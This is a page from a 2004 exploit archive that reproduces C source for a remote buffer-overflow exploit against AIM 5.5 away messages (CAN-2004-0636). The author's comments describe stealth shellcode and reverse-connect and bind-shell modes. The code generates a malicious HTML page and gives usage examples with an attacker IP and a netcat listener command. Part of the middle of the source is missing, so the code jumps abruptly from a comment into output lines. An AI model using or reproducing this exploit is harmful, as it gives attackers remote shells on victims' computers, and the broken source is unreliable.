AOL Instant Messenger AIM "Away" Message Remote Exploit

 

                        

                          

                            
                          

                        

                      


                      
/* CAN-2004-0636 */

/*
 * AIM Away Message Buffer Overflow Exploit
 *   Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit: 
 * ========
 *   drizzit.c
 *
 * Vulnerable Software:
 * ====================
 *    - AIM 5.5.3588
 *    - AIM 5.5.3590 Beta
 *    - AIM 5.5.3591
 *    - AIM 5.5.3595
 *    and a couple others versions...
 *
 * If you want to try other return addressees for other versions of
 * AIM then edit the return address.. But the current one embedded 
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to 
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though I haven't tested
 * it yet.
 *
 * On a side note I pourposly did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitchs messing peoples computers up for profit.. You can
 * still download/upload through the shell to the victim. It just 
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then 
 * when the victim visits the evil web page or email whatever.. then the
 * attack will automatically open his AIM even its not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what him them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on a 
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no puts small limits on the 
 * \n");
                fprintf(EXPLOIT_FP, "\n");
                fprintf(EXPLOIT_FP, "\n");

                fclose(EXPLOIT_FP);

                /* im to lazy to make a macro for this banner :P */
                printf(" +-------------------------------------------------+\n");
                printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
                printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
                printf(" +-------------------------------------------------+\n\n");

                printf(" Exploit created!\n\n");

                printf(" Remember if you use the -r option to have netcat listening\n");
                printf(" on the port you are using for the attack so the victim will\n");
                printf(" be able to connect to you when exploited...\n\n");
                printf(" Example:\n");
                printf("\tnc.exe -l -p %d", port);
        }

        return(EXIT_SUCCESS);
}

void print_usage(char *prog_name)
{
        printf(" +-------------------------------------------------+\n");
        printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
        printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
        printf(" +-------------------------------------------------+\n\n");
        printf(" Exploit Usage:\n");
        printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
        printf(" Parameters:\n");
        printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
        printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
is reverse connect  then the port you\n\t\t\t\t specify will be the one you want
to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
        printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If
you would like output go straight to\n\t\t\t\t standerd output then specify the
-o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create
the exploit file which is basically\n\t\t\t\t a simple html file. The -o option
is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different
ways.\n\n");
        printf(" Examples:\n");
        printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
        printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
        printf("\t%s -b -o\n", prog_name);
        printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
        printf(" Remember if you use the -r option to have netcat listening\n");
        printf(" on the port you are using for the attack so the victim will\n");
        printf(" be able to connect to you when exploited...\n\n");
        printf(" Example:\n");
        printf("\tnc.exe -l -p 8888");
        exit(-1);
}

unsigned char xor_data(unsigned char byte)
{
        return(byte ^ 0x92);
}

                    		
                  

                

              

            

            

              
                

                  
                    
 F-VNS Security Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

                  		
                

              
            

          		
        

      
    

  

  

    

      
        

          
Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

        

      		
    

  

  

    

      
        
actualité informatique  Exploits